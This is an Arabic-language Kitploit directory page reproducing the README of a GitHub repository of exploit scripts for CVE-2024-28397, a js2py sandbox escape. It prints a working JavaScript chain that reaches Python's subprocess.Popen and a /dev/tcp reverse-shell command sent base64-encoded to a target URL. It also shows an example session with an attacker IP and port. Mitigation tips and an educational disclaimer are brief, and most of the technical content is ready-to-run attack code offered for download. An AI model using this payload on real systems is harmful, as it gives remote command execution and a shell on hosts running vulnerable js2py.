Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
js2py-Sandbox-Escape-CVE-2024-28397-RCE — # نصوص استغلال لـ CVE-2024-28397، ثغرة هروب من بيئة js2py المعزولة تنفذ كود Python عشوائيًا لفتح قشرة عكسية على نقطة الهدف. | Kitploit
أدوات/GitHubGitHub/0xdtc/js2py-sandbox-escape-cve-2024-28397-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعد
GitHub0xdtc/js2py-sandbox-escape-cve-2024-28397-rce

js2py-Sandbox-Escape-CVE-2024-28397-RCE

# نصوص استغلال لـ CVE-2024-28397، ثغرة هروب من بيئة js2py المعزولة تنفذ كود Python عشوائيًا لفتح قشرة عكسية على نقطة الهدف.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
36منذ 0 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2024-28397 استغلال الهروب من صندوق الرمل js2py

مجموعة من سكريبتات الاستغلال التي تستهدف ثغرة الهروب من صندوق الرمل js2py (CVE-2024-28397) والتي تسمح بتنفيذ تعليمات برمجية عشوائية من خلال فحص كائنات بايثون الداخلية.

🔍 نظرة عامة على الثغرة

تحتوي مكتبة js2py على ثغرة حرجة للهروب من صندوق الرمل تسمح للمهاجمين بتنفيذ كود بايثون عشوائي عن طريق الوصول إلى كائنات بايثون الداخلية من خلال طريقة Object.getOwnPropertyNames() في جافاسكريبت.

تفاصيل تقنية

  • معرف CVE: CVE-2024-28397
  • المكتبة المتأثرة: js2py (مترجم من جافاسكريبت إلى بايثون)
  • ناقل الهجوم: الهروب من صندوق الرمل عبر فحص كائنات بايثون
  • الأثر: تنفيذ تعليمات برمجية عن بعد (RCE)

📋 تحليل المرجع

يعتمد هذا الاستغلال على التحليل الشامل الذي أجراه Marven11:

  • وثيقة التحليل: CVE-2024-28397 js2py Sandbox Escape Analysis

🛠️ سكريبتات الاستغلال

يحتوي هذا المستودع على ثلاثة تطبيقات مختلفة:

1. سكريبت Bash (exploit.sh)

تطبيق Bash خفيف الوزن باستخدام curl و jq.

2. سكريبت Go (exploit.go)

تطبيق Go عبر المنصات مع عميل HTTP مدمج.

🚀 بداية سريعة

المتطلبات الأساسية

  • لسكريبت Bash: curl، jq، base64
  • لسكريبت Go: Go 1.16+

الاستخدام

جميع السكريبتات تفاعلية وستطلب المعلومات المطلوبة:

root@kitploit:~
# Bash version
chmod +x exploit.sh
./exploit.sh

# Go version
go run exploit.go

المطالبات التفاعلية

سيطلب كل سكريبت:

  1. URL الهدف: نقطة النهاية التي تشغل كود js2py الثغري
  2. عنوان IP الخاص بك: عنوان IP لجهازك لاستخدام الصدفة العكسية
  3. المنفذ الخاص بك: رقم المنفذ لاتصال الصدفة العكسية

جلسة مثال

root@kitploit:~
$ ./exploit.sh
Target URL: http://target.example.com:8000/run_code
Your IP: 10.10.14.3
Your Port: 9001
Sending to http://target.example.com:8000/run_code with reverse shell 10.10.14.3:9001
{"result": "executed"}

🎯 كيف يعمل

1. توليد الحمولة

يقوم الاستغلال بإنشاء أمر صدفة عكسية ديناميكياً:

root@kitploit:~
sh -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1

2. ترميز Base64

يتم ترميز أمر الصدفة بـ base64 للنقل الآمن:

root@kitploit:~
base64_payload=$(echo -n "$reverse_shell" | base64 -w 0)

3. الهروب من صندوق الرمل جافا سكريبت

يستخدم الاستغلال الأساسي جافاسكريبت للوصول إلى كائنات بايثون الداخلية:

root@kitploit:~
let cmd = "printf BASE64_PAYLOAD|base64 -d|bash";
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a,"__class__"), "__base__");
function findpopen(o) {
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i];
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
        if(item.__name__ != "type") {
            let result = findpopen(item);
            if(result) return result;
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();

4. سير التنفيذ

  1. الوصول إلى نظام كائنات بايثون من خلال Object.getOwnPropertyNames({})
  2. التنقل إلى الفئات الأساسية عبر __class__.__base__.__getattribute__
  3. البحث في الفئات الفرعية عن subprocess.Popen
  4. تنفيذ أوامر نظام عشوائية من خلال Popen

🛡️ التخفيف

  • تحديث js2py إلى إصدار مصحح
  • تطبيق التحقق من صحة المدخلات وتطهيرها بشكل صحيح
  • استخدام بدائل آمنة لصندوق الرمل
  • تطبيق إجراءات أمنية متعددة الطبقات

📚 الغرض التعليمي

هذه السكريبتات مُقدمة لأغراض تعليمية واختبارية مصرح بها فقط. تأكد دائمًا من حصولك على الترخيص المناسب قبل الاختبار على أي أنظمة.

🔗 المراجع

  • CVE-2024-28397 Official Entry
  • Marven11's Detailed Analysis
  • js2py GitHub Repository

⚖️ إخلاء مسؤولية

يتم توفير هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط. يتحمل المستخدمون مسؤولية الامتثال للقوانين المعمول بها والحصول على الترخيص المناسب قبل الاستخدام.

تنزيل الأداة